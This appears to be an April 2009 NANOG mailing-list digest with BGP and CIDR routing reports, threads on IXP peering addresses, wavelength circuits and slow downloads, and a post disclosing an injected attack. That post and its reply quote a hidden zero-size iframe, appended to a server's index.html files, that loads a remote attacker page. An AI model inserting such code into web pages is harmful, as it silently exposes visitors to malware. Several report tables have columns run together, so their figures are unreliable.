BGP Update Report
BGP Update Report Interval: 16-Mar-09 -to- 16-Apr-09 (32 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASNUpds % Upds/PfxAS-Name 1 - AS6389 336400 4.2% 77.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc. 2 - AS238693991 1.2% 72.4 -- INS-AS - AT&T Data Communications Services 3 - AS845287338 1.1% 61.2 -- TEDATA TEDATA 4 - AS647874423 0.9% 54.9 -- ATT-INTERNET3 - AT&T WorldNet Services 5 - AS29049 61885 0.8% 191.0 -- DELTA-TELECOM-AS Delta Telecom LTD. 6 - AS11492 59264 0.7% 48.5 -- CABLEONE - CABLE ONE, INC. 7 - AS12978 54276 0.7% 299.9 -- DOGAN-ONLINE Dogan Iletisim Elektronik Servis Hizmetleri AS 8 - AS10796 52716 0.7% 54.0 -- SCRR-10796 - Road Runner HoldCo LLC 9 - AS701851476 0.6% 34.1 -- ATT-INTERNET4 - AT&T WorldNet Services 10 - AS19262 50870 0.6% 51.8 -- VZGNI-TRANSIT - Verizon Internet Services Inc. 11 - AS949849199 0.6% 69.5 -- BBIL-AP BHARTI Airtel Ltd. 12 - AS982948838 0.6% 74.3 -- BSNL-NIB National Internet Backbone 13 - AS17488 47441 0.6% 30.5 -- HATHWAY-NET-AP Hathway IP Over Cable Internet 14 - AS35805 44809 0.6% 138.7 -- UTG-AS United Telecom AS 15 - AS662939731 0.5% 611.2 -- NOAA-AS - NOAA 16 - AS20115 37139 0.5% 22.0 -- CHARTER-NET-HKY-NC - Charter Communications 17 - AS432334658 0.4% 8.0 -- TWTC - tw telecom holdings, inc. 18 - AS645833219 0.4% 83.7 -- Telgua 19 - AS701 31261 0.4% 36.2 -- UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 20 - AS754531200 0.4% 37.8 -- TPG-INTERNET-AP TPG Internet Pty Ltd TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASNUpds % Upds/PfxAS-Name 1 - AS771713041 0.2% 13041.0 -- OPENIXP-AS-ID-AP OpenIXP ASN 2 - AS46653 17118 0.2%5706.0 -- FREDRIKSON---BYRON - Fredrikson & Byron, P.A. 3 - AS142236661 0.1%3330.5 -- NYSDOH - New York State Department of Health 4 - AS190172284 0.0%2284.0 -- QUALCOMM-QWBS-LV - Qualcomm, Inc. 5 - AS32398 16537 0.2%2067.1 -- REALNET-ASN-1 6 - AS46328 17359 0.2%1928.8 -- PTCNEBRASKA - PIERCE TELEPHONE COMPANY, INCORPORATED 7 - AS505024762 0.3%1904.8 -- PSC-EXT - Pittsburgh Supercomputing Center 8 - AS403441403 0.0%1403.0 -- PROSK-1 - Pro Sky Wireless 9 - AS422916892 0.1%1378.4 -- ISTRANET-AS Istranet LLC 10 - AS9796 3846 0.1%1282.0 -- WIPRO Internet Service Providers 11 - AS476403751 0.1%1250.3 -- TRICOMPAS Tricomp Sp. z. o. o. 12 - AS343212339 0.0%1169.5 -- LDK-AS Institute of strategic marks, Kiev, Ukraine 13 - AS150453175 0.0%1058.3 -- KITTELSON - KITTELSON AND ASSOCIATES, INC. 14 - AS209253140 0.0%1046.7 -- RESEAU-DANZAS DANZAS Autonomous System 15 - AS193981903 0.0% 951.5 -- INDENET - Indenet.net 16 - AS13683 870 0.0% 870.0 -- AUTO-WARES-ASN - Auto-Wares Inc 17 - AS34996 864 0.0% 864.0 -- ANADOLUSIGORTA-AS Anadolu Sigorta AS 18 - AS45417 857 0.0% 857.0 -- CFLINDIA-NET-IN 1-2-10, S P ROAD 19 - AS569110548 0.1% 811.4 -- MITRE-AS-5 - The MITRE Corporation 20 - AS17975 11140 0.1% 795.7 -- APT-AP AS# for peering purpose with IX and ISP. TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 72.23.246.0/2424649 0.3% AS5050 -- PSC-EXT - Pittsburgh Supercomputing Center 2 - 199.45.13.0/2417096 0.2% AS46653 -- FREDRIKSON---BYRON - Fredrikson & Byron, P.A. 3 - 41.204.2.0/24 16348 0.2% AS32398 -- REALNET-ASN-1 4 - 192.35.129.0/24 13238 0.2% AS6629 -- NOAA-AS - NOAA 5 - 198.77.177.0/24 13096 0.1% AS6629 -- NOAA-AS - NOAA 6 - 121.101.184.0/24 13069 0.1% AS38785 -- BAGUSNET-AS-ID PT. BORNEO BROADBAND TECHNOLOGY AS7717 -- OPENIXP-AS-ID-AP OpenIXP ASN 7 - 192.102.88.0/24 13056 0.1% AS6629 -- NOAA-AS - NOAA 8 - 222.255.51.64/26 10659 0.1% AS7643 -- VNN-AS-AP Vietnam Posts and Telecommunications (VNPT) 9 - 192.12.120.0/24 10423 0.1% AS5691 -- MITRE-AS-5 - The MITRE Corporation 10 - 202.92.235.0/247623 0.1% AS9498 -- BBIL-AP BHARTI Airtel Ltd. 11 - 192.135.176.0/24 6651 0.1% AS14223 -- NYSDOH - New York State Department of Health 12 - 195.96.69.0/24 5816 0.1% AS8225 -- ASTELIT-MSK-AS Astelit Autonomous System 13 - 202.154.60.0/225797 0.1% AS4434 -- ERX-RADNET1-AS PT Rahajasa Media Internet 14 - 193.201.184.0/21 5599 0.1% AS25546 -- BROOKLANDCOMP-AS Brookland Compute
The Cidr Report
This report has been generated at Fri Apr 17 21:14:20 2009 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.
Check http://www.cidr-report.org for a current version of this report.
Recent Table History
Date PrefixesCIDR Agg
10-04-09291172 182326
11-04-09291634 182060
12-04-09291501 182042
13-04-09291931 182023
14-04-09291973 182186
15-04-09291867 182331
16-04-09291834 182793
17-04-09292288 182981
AS Summary
31130 Number of ASes in routing system
13215 Number of ASes announcing only one prefix
4304 Largest number of prefixes announced by an AS
AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc.
89541120 Largest address span announced by an AS (/32s)
AS27064: DDN-ASNBLK1 - DoD Network Information Center
Aggregation Summary
The algorithm used in this report proposes aggregation only
when there is a precise match using the AS path, so as
to preserve traffic transit policies. Aggregation is also
proposed across non-advertised address space ('holes').
--- 17Apr09 ---
ASnumNetsNow NetsAggr NetGain % Gain Description
Table 292476 183014 10946237.4% All ASes
AS6389 4304 359 394591.7% BELLSOUTH-NET-BLK -
BellSouth.net Inc.
AS4323 4262 1697 256560.2% TWTC - tw telecom holdings,
inc.
AS209 2647 1183 146455.3% ASN-QWEST - Qwest
Communications Corporation
AS4766 1800 515 128571.4% KIXS-AS-KR Korea Telecom
AS17488 1536 348 118877.3% HATHWAY-NET-AP Hathway IP Over
Cable Internet
AS22773 1049 66 98393.7% ASN-CXA-ALL-CCI-22773-RDC -
Cox Communications Inc.
AS4755 1181 283 89876.0% TATACOMM-AS TATA
Communications formerly VSNL
is Leading ISP
AS8452 1252 357 89571.5% TEDATA TEDATA
AS8151 1446 570 87660.6% Uninet S.A. de C.V.
AS1785 1746 923 82347.1% AS-PAETEC-NET - PaeTec
Communications, Inc.
AS19262 979 236 74375.9% VZGNI-TRANSIT - Verizon
Internet Services Inc.
AS6478 1361 783 57842.5% ATT-INTERNET3 - AT&T WorldNet
Services
AS855643 76 56788.2% CANET-ASN-4 - Bell Aliant
Regional Communications, Inc.
AS18566 1060 493 56753.5% COVAD - Covad Communications
Co.
AS11492 1177 614 56347.8% CABLEONE - CABLE ONE, INC.
AS18101 753 218 53571.0% RIL-IDC Reliance Infocom Ltd
Internet Data Centre,
AS2706 543 41 50292.4% HKSUPER-HK-AP Pacific Internet
(Hong Kong) Limited
AS22047 611 113 49881.5% VTR BANDA ANCHA S.A.
AS7545 804 318 48660.4% TPG-INTERNET-AP TPG Internet
Pty Ltd
AS17908 607 123 48479.7% TCISL Tata Communications
AS7018 1477 1018 45931.1% ATT-INTERNET4 - AT&T WorldNet
Services
AS6517 720 261 45963.8% RELIANCEGLOBALCOM - Reliance
Globalcom Services, Inc
AS4808 617 164 45373.4% CHINA169-BJ CNCGROUP IP
network China169 Beijing
Province Network
AS4804 497 64 43387.1% MPX-AS Microplex PTY LTD
AS24560 682 257 42562.3% AIRTELBROADBAND-AS-AP Bharti
Airtel Ltd., Telemedia
Services
AS17676 561 137 42475.6% GIGAINFRA BB TECHNOLOGY Corp.
AS7011 958 551 40742.5% FRONTIER-AND-CITIZENS -
Frontier Communications of
America, Inc.
AS4668 687 282 40559.0% LGNET-AS-KR LG CNS
AS4134 894 528 36640.9% CHINANET-BACKBONE
IXP
Hello NANOG, I like would to know what are best practices for an internet exchange. I have some concerns about the following; Can the IXP members use RFC 1918 ip addresses for their peering? Can the IXP members use private autonomous numbers for their peering? Maybe the answer is obviuos, but I like to know from any IXP admins what their setup/experiences have been. -- --sharlon
Re: IXP
On Fri, Apr 17, 2009 at 10:11:30AM -0400, Sharlon R. Carty wrote: > Hello NANOG, > > I like would to know what are best practices for an internet exchange. I > have some concerns about the following; > Can the IXP members use RFC 1918 ip addresses for their peering? > Can the IXP members use private autonomous numbers for their peering? > > Maybe the answer is obviuos, but I like to know from any IXP admins what > their setup/experiences have been. > > -- > --sharlon 15 years into the exchange trade has given me the following insights: RFC1918 space can be used - but virtually everyone who starts there migrates to globally unique space. Private ASNs - same deal. Private ASNs tend to have special treatment inside ISPs - so path matching gets you in the end. --bill
Re: IXP
m...@sharloncarty.net (Sharlon R. Carty) wrote: > I like would to know what are best practices for an internet exchange. I > have some concerns about the following; > Can the IXP members use RFC 1918 ip addresses for their peering? No. Those IP addresses will at least appear on traceroutes; also, it might not be such a good idea to use the same RFC1918 space (accidentally) on different IXPs. This will get your skin crawling (thing IGP, or at least config databases)... IXPs can usually get a v4 and a v6 block for their peering grid easily. > Can the IXP members use private autonomous numbers for their peering? They could, but what would you then do with them inside your IGP? And apart from that - ISPs that want to peer tend to have their ASNs ready... I am not an IXP operator, but I know of no exchange (public or private, big or closet-style) that uses private ASNs or RFC1918 space. Elmar.
Re: IXP
> Hello NANOG, > > I like would to know what are best practices for an internet exchange. I > have some concerns about the following; > Can the IXP members use RFC 1918 ip addresses for their peering? > Can the IXP members use private autonomous numbers for their peering? > > Maybe the answer is obviuos, but I like to know from any IXP admins what > their setup/experiences have been. If you read RFC1918, the intention is to use that space within an enterprise. There is some wisdom there. It is unclear why you would want to do this, as the ARIN/etc allocation rules for an IXP are generally trivial. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples.
Re: IXP
Theorically it's doable. But mostly No to your questions. IXP means Internet eXchange Point. So it is public Internet. Why do you want to use private IP address ? Most RIR allocate /24 unit for IXP. For troubleshooting purpose, it is better to use public IP address as it is designed. Unless you want to have MPLS/VPN only connections, and use private IP Addr/ASN between them. Sharlon R. Carty wrote: > Hello NANOG, > > I like would to know what are best practices for an internet exchange. I > have some concerns about the following; > Can the IXP members use RFC 1918 ip addresses for their peering? > Can the IXP members use private autonomous numbers for their peering? > > Maybe the answer is obviuos, but I like to know from any IXP admins what > their setup/experiences have been. > >
Re: So I've got this 2.5gig wave, what do I do with it?
On 4/16/09 6:34 PM, "w...@loopfree.net" wrote: > Due to the vagaries of telecom pricing, I've ended up with a 2.5gig > wavelength service between two locations when what I really wanted was a > gig-e or two. > > I'm really not sure if this is a "transparent" wave service or not... > the carrier is using gear from Ciena to hand it off to us and they seem > to be big on transparent waves, so maybe it is, but nobody seems to be > able to say for sure. We use these types of circuits and I manage several others for clients. Every time I turn one up I make sure I talk to an engineer and ask if they are expecting a 2.5Gig signal and just going to use transponders to put my 1310nm signal into a DWDM color send it to the other side, and transponder it back to 1310nm. They've always said that's exactly what they are doing. I used Cerent 15454 (now Cisco) w/ Oc48 IR 1310 cards facing the wave, and proper cross connect and Gig cards (carefull here) facing my gig switches. Shoot me an off list message and I'll help you w/ the ins and outs and share the costs we budget for such. I haven't used MRV but they look appealing, would love to hear other folks experience with them as I'm about to have to turn another two of these up... -- W. Kevin Hunt CCIE #11841
Weekly Routing Table Report
This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. Daily listings are sent to bgp-st...@lists.apnic.net For historical data, please see http://thyme.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 18 Apr, 2009 Report Website: http://thyme.apnic.net Detailed Analysis: http://thyme.apnic.net/current/ Analysis Summary BGP routing table entries examined: 285512 Prefixes after maximum aggregation: 135036 Deaggregation factor: 2.11 Unique aggregates announced to Internet: 140735 Total ASes present in the Internet Routing Table: 30995 Prefixes per ASN: 9.21 Origin-only ASes present in the Internet Routing Table: 26993 Origin ASes announcing only one prefix: 13113 Transit ASes present in the Internet Routing Table:4002 Transit-only ASes present in the Internet Routing Table: 96 Average AS path length visible in the Internet Routing Table: 3.6 Max AS path length visible: 33 Max AS path prepend of ASN (43683) 31 Prefixes from unregistered ASNs in the Routing Table: 457 Unregistered ASNs in the Routing Table: 153 Number of 32-bit ASNs allocated by the RIRs:140 Prefixes from 32-bit ASNs in the Routing Table: 22 Special use prefixes present in the Routing Table:0 Prefixes being announced from unallocated address space:213 Number of addresses announced to Internet: 2032726080 Equivalent to 121 /8s, 40 /16s and 240 /24s Percentage of available address space announced: 54.8 Percentage of allocated address space announced: 64.1 Percentage of available address space allocated: 85.5 Percentage of address space in use by end-sites: 76.4 Total number of prefixes smaller than registry allocations: 140850 APNIC Region Analysis Summary - Prefixes being announced by APNIC Region ASes:66222 Total APNIC prefixes after maximum aggregation: 23572 APNIC Deaggregation factor:2.81 Prefixes being announced from the APNIC address blocks: 62977 Unique aggregates announced from the APNIC address blocks:28795 APNIC Region origin ASes present in the Internet Routing Table:3598 APNIC Prefixes per ASN: 17.50 APNIC Region origin ASes announcing only one prefix:966 APNIC Region transit ASes present in the Internet Routing Table:545 Average APNIC Region AS path length visible:3.6 Max APNIC Region AS path length visible: 18 Number of APNIC addresses announced to Internet: 410974496 Equivalent to 24 /8s, 126 /16s and 249 /24s Percentage of available APNIC address space announced: 81.7 APNIC AS Blocks4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079 APNIC Address Blocks58/8, 59/8, 60/8, 61/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, ARIN Region Analysis Summary Prefixes being announced by ARIN Region ASes:124873 Total ARIN prefixes after maximum aggregation:65846 ARIN Deaggregation factor: 1.90 Prefixes being announced from the ARIN address blocks:94104 Unique aggregates announced from the ARIN address blocks: 36841 ARIN Region origin ASes present in the Internet Routing Table:12932 ARIN Prefixes per ASN: 7.28 ARIN Region origin ASes announcing only one prefix:4994 ARIN Region transit ASes present in the Internet Routing Table:1253 Average ARIN Region AS path length visible: 3.3 Max ARIN Region AS path length visible: 20 Number of ARIN addresses announced to Internet: 426730496 Equivalent to 25 /8s, 111 /16s and 100 /24s Percentage of available ARIN address space announced: 82.0 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-315
RE: IXP
> > I like would to know what are best practices for an > internet exchange. > > I have some concerns about the following; Can the IXP > members use RFC > > 1918 ip addresses for their peering? > > No. Those IP addresses will at least appear on traceroutes; > also, it might not be such a good idea to use the same RFC1918 space > (accidentally) on different IXPs. This will get your skin > crawling (thing IGP, or at least config databases)... IXPs > can usually get a v4 and a v6 block for their peering grid easily. Anyone with a decently configured firewall would block IP packets with source address from RFC1918 coming from the Internet. Your IXP would appear as a black hole in traceroute printout because the ICMP replies sent from the IXP IP addresses would be blocked. A while ago I've described a few more caveats in an article (see http://blog.ioshints.info/2008/08/private-ip-addresses-in-public-networks.ht ml). Ivan http://www.ioshints.info/about http://blog.ioshints.info/
RE: So I've got this 2.5gig wave, what do I do with it?
> -Original Message- > From: Kevin Hunt [mailto:kh...@huntbrothers.com] > Sent: Friday, April 17, 2009 12:28 PM > To: w...@loopfree.net; nanog@nanog.org > Subject: Re: So I've got this 2.5gig wave, what do I do with it? > > I haven't used MRV but they look appealing, would love to hear other folks > experience with them as I'm about to have to turn another two of these > up... > > -- We use the MRV LamdaDrivers and they work well. We use the EM2009-G2 on our own dark fiber loops and provide dual GE connectivity on a single 2.5G wavelength. Equipment is pretty barebones, but quite solid. Management module can be rebooted without loss of light on any interfaces (besides those terminated on the management module, of course). There's plenty of options for SFPs wrt distances. However, since the OP is receiving a lit signal from the carrier, I'm not entirely sure it will work in his case, as I *believe* the trunk port requires a WDM SFP, not a standard 850/1310/1550. I could certainly be wrong, though. -evt
Re: IXP
with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe. just put each pair of peers into their own private tagged vlan and let one of them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third party BGP (which nobody really liked which sometimes got turned on by mistake) and prevents transit dumping and/or "pointing default at" someone. the IXP no longer needs any address space, they're just a VPN provider. shared-switch connections are just virtual crossconnects. -- Paul Vixie
Re: IXP
On Fri, 17 Apr 2009, Paul Vixie wrote: > with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe. > just put each pair of peers into their own private tagged vlan. Uh, I'm not sure whether you're being sarcastic or not. -Bill
Re: IXP
On 17.04.2009 20:52 Paul Vixie wrote > with the advent of vlan tags, the whole idea of CSMA for IXP networks is > passe. > just put each pair of peers into their own private tagged vlan and let one of > them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third > party BGP (which nobody really liked which sometimes got turned on by mistake) > and prevents transit dumping and/or "pointing default at" someone. the IXP no > longer needs any address space, they're just a VPN provider. shared-switch > connections are just virtual crossconnects. Large IXP have >300 customers. You would need up to 45k vlan tags, wouldn't you? Arnold -- Arnold Nipper / nIPper consulting, Sandhausen, Germany email: arn...@nipper.de phone: +49 6224 9259 299 mobile: +49 172 2650958 fax: +49 6224 9259 333 signature.asc Description: OpenPGP digital signature
RE: So I've got this 2.5gig wave, what do I do with it?
> -Original Message- > From: Eric Van Tol [mailto:e...@atlantech.net] > Sent: Friday, April 17, 2009 2:44 PM > To: nanog@nanog.org > Subject: RE: So I've got this 2.5gig wave, what do I do with it? > > > -Original Message- > > From: Kevin Hunt [mailto:kh...@huntbrothers.com] > > Sent: Friday, April 17, 2009 12:28 PM > > To: w...@loopfree.net; nanog@nanog.org > > Subject: Re: So I've got this 2.5gig wave, what do I do with it? > > > > > I haven't used MRV but they look appealing, would love to hear other > folks > > experience with them as I'm about to have to turn another two of these > > up... > > > > -- > > We use the MRV LamdaDrivers and they work well. We use the EM2009-G2 on > our own dark fiber loops and provide dual GE connectivity on a single 2.5G > wavelength. Equipment is pretty barebones, but quite solid. Management > module can be rebooted without loss of light on any interfaces (besides > those terminated on the management module, of course). There's plenty of > options for SFPs wrt distances. However, since the OP is receiving a lit > signal from the carrier, I'm not entirely sure it will work in his case, > as I *believe* the trunk port requires a WDM SFP, not a standard > 850/1310/1550. I could certainly be wrong, though. > > -evt Sorry to respond to my own post, but I was getting the EM2009-GM2 mixed up with another module we use. We do use the EM2009-GM2, but it does not have an SFP trunk port - it's just a pair of SC connectors on the trunk side. Looks like it can be configured for a specific wavelength by the setting of some jumpers on the module, and it looks like 1310 is possible. -evt
Re: IXP
On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote: On 17.04.2009 20:52 Paul Vixie wrote with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe. just put each pair of peers into their own private tagged vlan and let one of them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third party BGP (which nobody really liked which sometimes got turned on by mistake) and prevents transit dumping and/or "pointing default at" someone. the IXP no longer needs any address space, they're just a VPN provider. shared-switch connections are just virtual crossconnects. Large IXP have >300 customers. You would need up to 45k vlan tags, wouldn't you? QinQ could solve this Kris
Re: IXP
On 17.04.2009 21:04 kris foster wrote > On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote: > >> On 17.04.2009 20:52 Paul Vixie wrote >> >>> with the advent of vlan tags, the whole idea of CSMA for IXP >>> networks is passe. >>> just put each pair of peers into their own private tagged vlan and >>> let one of >>> them allocate a V4 /30 and a V6 /64 for it. as a bonus, this >>> prevents third >>> party BGP (which nobody really liked which sometimes got turned on >>> by mistake) >>> and prevents transit dumping and/or "pointing default at" someone. >>> the IXP no >>> longer needs any address space, they're just a VPN provider. >>> shared-switch >>> connections are just virtual crossconnects. >> >> Large IXP have >300 customers. You would need up to 45k vlan tags, >> wouldn't you? > > QinQ could solve this > not really -- Arnold Nipper / nIPper consulting, Sandhausen, Germany email: arn...@nipper.de phone: +49 6224 9259 299 mobile: +49 172 2650958 fax: +49 6224 9259 333 signature.asc Description: OpenPGP digital signature
Re: IXP
Sorry, hit "send" a little early, by accident. On Apr 17, 2009, at 11:52 AM, Paul Vixie wrote: with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe. just put each pair of peers into their own private tagged vlan. I'm not sure whether you're being sarcastic, and if I'm not sure, I bet people who don't know you really aren't sure. So: the only nominal IXP I know of where that's really been experimented with seriously is MYIX, in Kuala Lumpur, where it's been a notable failure. The other 300-and-some IXPs do things normally, with an IX subnet that people can peer across. So, the advent of standardized . 1Q tags in 1998, preceded by ISL for many years before that, has not yet rendered the 99.6% majority best-practice passe. Just a clarification. -Bill PGP.sig Description: This is a digitally signed message part
Re: IXP
On Fri, 17 Apr 2009, Arnold Nipper wrote: Large IXP have >300 customers. You would need up to 45k vlan tags, wouldn't you? ... and exchanging multicast would be... err.. suboptimal. -- Mikael Abrahamssonemail: swm...@swm.pp.se
Re: IXP
On Apr 17, 2009, at 12:05 PM, Arnold Nipper wrote: On 17.04.2009 21:04 kris foster wrote On Apr 17, 2009, at 12:00 PM, Arnold Nipper wrote: On 17.04.2009 20:52 Paul Vixie wrote with the advent of vlan tags, the whole idea of CSMA for IXP networks is passe. just put each pair of peers into their own private tagged vlan and let one of them allocate a V4 /30 and a V6 /64 for it. as a bonus, this prevents third party BGP (which nobody really liked which sometimes got turned on by mistake) and prevents transit dumping and/or "pointing default at" someone. the IXP no longer needs any address space, they're just a VPN provider. shared-switch connections are just virtual crossconnects. Large IXP have >300 customers. You would need up to 45k vlan tags, wouldn't you? QinQ could solve this not really painfully, with multiple circuits into the IX :) I'm not advocating Paul's suggestion at all here Kris
Re: IXP - PNI
the vlan tagging idea is a virtualization of the PNI construct. why use an IX when running 10's/100's/1000's of private network interconnects will do? granted, if out of the 120 ASN's at an IX, 100 are exchanging on average - 80KBs - then its likley safe to dump them all into a single physical port and vlan tag the heck out of it. its those other 20 that demand some special care. (welcome to "how to grow your presence at an IX and when to leave"-101 :) --bill
Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src="http://77.92.158.122/webmail/inc/web/index.php"; style="display: none;" height="0" width="0"> http://77.92.158.122/webmail/inc/web/index.php"; style="display: none;" height="0" width="0"> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
RE: Malicious code just found on web server
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -Original Message- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src="http://77.92.158.122/webmail/inc/web/index.php"; style="display: none;" height="0" width="0"> http://77.92.158.122/webmail/inc/web/index.php"; style="display: none;" height="0" width="0"> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
Re: IXP
> Large IXP have >300 customers. You would need up to 45k vlan tags, > wouldn't you? the 300-peer IXP's i've been associated with weren't quite full mesh in terms of who actually wanted to peer with whom, so, no.
Re: IXP
On Fri, Apr 17, 2009 at 09:00:53PM +0200, Arnold Nipper wrote: > Large IXP have >300 customers. You would need up to 45k vlan tags, > wouldn't you? Not only that, but when faced with the requirement of making the vlan IDs match on both sides of the exchange, most members running layer 3 switches with global vlan significance are going to hit major layer 8 hurdles negotiating the available IDs very quickly. A far better way to implement this is with a web portal brokered virtual crossconnect system, which provisions MPLS martini pwe or vpls circuits between members. This eliminates the vlan scaling and clash issues, as it shifts you from as 12-bit identifier to a 32-bit identifier with vlan tag handoffs to the clients being arbitrarily mapped as the client wishes. Such a system has significant advantages over traditional flat layer 2 switches, in things like security, reliability, flexibility, scalability (in members, traffic, and number of locations within the network), and multiservice use (since you can accurately bill with snmp counters per vlan-ID instead of just guestimating w/sflow). Of course trying to deploy such a system in the current IX market space (especially in the US) has its own unique challenges. :) -- Richard A Steenbergenhttp://www.e-gerbil.net/ras GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
downloading speed
Dear Group member, We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. our router is C12KPRP-K4P-M Please advise what could be the cause? -- Regards Chandrashakher Pawar IPNOC Customer & Services Operations Tata communication AS6453 mobil + 91 9225633948 + 91 9324509268 learn.chan...@gmail.com
Re: downloading speed
link speed duplex mismatch ? --- Nuno Vieira nfsi telecom, lda. nuno.vie...@nfsi.pt Tel. (+351) 21 949 2300 - Fax (+351) 21 949 2301 http://www.nfsi.pt/ - "chandrashakher pawar" wrote: > Dear Group member, > > We are level one ISP. one of my customer is connected to fast > ethernet. > His link speed 100,000 kbps. while downloading any thing from net he > downloading speed donot go above 200 kbps. > While doing multiple download he get aroung 200 kbps in every window. > But > when he close all the windows no change in downloading speed is > observed. > > our router is C12KPRP-K4P-M > > Please advise what could be the cause? > > -- > Regards > > Chandrashakher Pawar > IPNOC > Customer & Services Operations > Tata communication AS6453 > mobil + 91 9225633948 + 91 9324509268 > learn.chan...@gmail.com
Re: downloading speed
chandrashakher pawar wrote: Dear Group member, We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. our router is C12KPRP-K4P-M Please advise what could be the cause? Most likely: http://www.google.com/search?q=tcp+tuning Also check for duplex mismatch, cable problems, interface errors, etc. Also verify that you're comparing the same units, bits vs bytes. -- Jay Hennigan - CCIE #7880 - Network Engineering - j...@impulse.net Impulse Internet Service - http://www.impulse.net/ Your local telephone and internet company - 805 884-6323 - WB6RDV
Re: downloading speed
Bad cable?... What trouble shooting steps have been done? --Original Message-- From: chandrashakher pawar To: na...@merit.edu Subject: downloading speed Sent: Apr 17, 2009 5:23 PM Dear Group member, We are level one ISP. one of my customer is connected to fast ethernet. His link speed 100,000 kbps. while downloading any thing from net he downloading speed donot go above 200 kbps. While doing multiple download he get aroung 200 kbps in every window. But when he close all the windows no change in downloading speed is observed. our router is C12KPRP-K4P-M Please advise what could be the cause? -- Regards Chandrashakher Pawar IPNOC Customer & Services Operations Tata communication AS6453 mobil + 91 9225633948 + 91 9324509268 learn.chan...@gmail.com Sent on the Now Network� from my Sprint® BlackBerry
Re: IXP - PNI
On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote: the vlan tagging idea is a virtualization of the PNI construct. why use an IX when running 10's/100's/1000's of private network interconnects will do? granted, if out of the 120 ASN's at an IX, 100 are exchanging on average - 80KBs - then its likley safe to dump them all into a single physical port and vlan tag the heck out of it. its those other 20 that demand some special care. The construct also doesn't scale well for multicast traffic exchange if there's a significant number of multicast peers even though the traffic might be low for individual source ASNs. On the other hand, if the IXP doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't matter. Antonio Querubin whois: AQ7-ARIN
Re: IXP - PNI
> On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote: > > the vlan tagging idea is a virtualization of the PNI construct. > > why use an IX when running 10's/100's/1000's of private network > > interconnects will do? > > > > granted, if out of the 120 ASN's at an IX, 100 are exchanging on > > average - 80KBs - then its likley safe to dump them all into a single > > physical port and vlan tag the heck out of it. > > > > its those other 20 that demand some special care. > > The construct also doesn't scale well for multicast traffic exchange if > there's a significant number of multicast peers even though the traffic > might be low for individual source ASNs. On the other hand, if the IXP > doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't > matter. Didn't we go through all this with ATM VC's at the AADS NAP, etc? ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples.
Re: IXP - PNI
> The construct also doesn't scale well for multicast traffic exchange if > there's a significant number of multicast peers even though the traffic > might be low for individual source ASNs. On the other hand, if the IXP > doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't > matter. the people who do massive volumes of multicast in my experience have also been the ones whose network policies, or unicast traffic volumes, or both, prevented them from joining CSMA peering fabrics. CSMA assumes a large number of small flows, which is not what i see in the multicast market, but i admit that i'm not as involved as i used to be.
Re: downloading speed
